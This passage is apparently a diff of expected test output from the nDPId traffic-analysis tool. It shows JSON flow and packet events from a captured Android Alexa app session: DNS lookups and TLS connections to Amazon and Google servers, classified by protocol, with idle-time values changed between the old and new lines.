O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1490976195484,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195484,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WmRAAEARM1OsECrYrBAqATpWADUAKI0W4msBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1490976195524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976195524,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC96\/xAAEARoTmsECoBrBAq2AA1OlYAqVJ+4muBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAW8AAoDd3d3A2NkbsAQwCwABQABAAAAWAAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAABoABDRV0Y\/AQgABAAEAAAAaAAQ0VdF6wEIAAQABAAAAGgAENFXR2MBCAAEAAQAAABoABDRV0cU="} 00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195529,"flow_last_seen":1490976195529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195529,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1490976195529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195529,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8suhAAEAGqwasECrYNFXRj6NkAbuAhDhYAAAAAKAC\/\/+BjwAAAgQFtAQCCAoA9oqwAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195529,"flow_last_seen":1490976195529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195529,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1490976195529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195529,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8suhAAEAGqwasECrYNFXRj6NkAbuAhDhYAAAAAKAC\/\/+BjwAAAgQFtAQCCAoA9oqwAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1490976195545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1490976195545,"pkt":"AMDKkaPvePiC0\/vCCABFAABIWmVAAEARM0asECrYrBAqAZ3pADUANBzi5IoBAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} 
00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1490976195572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195572,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7o2R8wwHRgIQ4WaAScSCn6AAAAgQFtAQCCApttHwsAPaKsAEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2799,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1490976195573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195573,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0sulAAEAGqw2sECrYNFXRj6NkAbuAhDhZfMMB0oAQAVdGegAAAQEICgD2irVttHws"} 
-00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1490976195572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195572,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7o2R8wwHRgIQ4WaAScSCn6AAAAgQFtAQCCApttHwsAPaKsAEDAwg="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2799,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1490976195573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195573,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0sulAAEAGqw2sECrYNFXRj6NkAbuAhDhZfMMB0oAQAVdGegAAAQEICgD2irVttHws"} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 
00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1490976195628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976195628,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw6\/5AAEARoYSsECoBrBAq2AA1nekAXGuw5IqBgAABAAIAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAErAAwHYW5kcm9pZAFswBzAOAABAAEAAAErAATYOsJO"} 00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195633,"flow_last_seen":1490976195633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195633,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1490976195633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195633,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fD5AAEAGTQysECrY2DrCTr+rAbtBfvaFAAAAAKAC\/\/9RcQAAAgQFtAQCCAoA9oq7AAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1490976195670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195670,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8ibgAADcGiJLYOsJOrBAq2AG7v6uBvvSDQX72hqASpajvAAAAAgQFZAQCCAoLBTvAAPaKuwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1490976195672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195672,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0fD9AAEAGTROsECrY2DrCTr+rAbtBfvaGgb70hIAQAVfBygAAAQEICgD2ir8LBTvA"} 
-00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} -02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195633,"flow_last_seen":1490976195633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195633,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1490976195633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195633,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fD5AAEAGTQysECrY2DrCTr+rAbtBfvaFAAAAAKAC\/\/9RcQAAAgQFtAQCCAoA9oq7AAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1490976195670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195670,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8ibgAADcGiJLYOsJOrBAq2AG7v6uBvvSDQX72hqASpajvAAAAAgQFZAQCCAoLBTvAAPaKuwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1490976195672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195672,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0fD9AAEAGTROsECrY2DrCTr+rAbtBfvaGgb70hIAQAVfBygAAAQEICgD2ir8LBTvA"} 
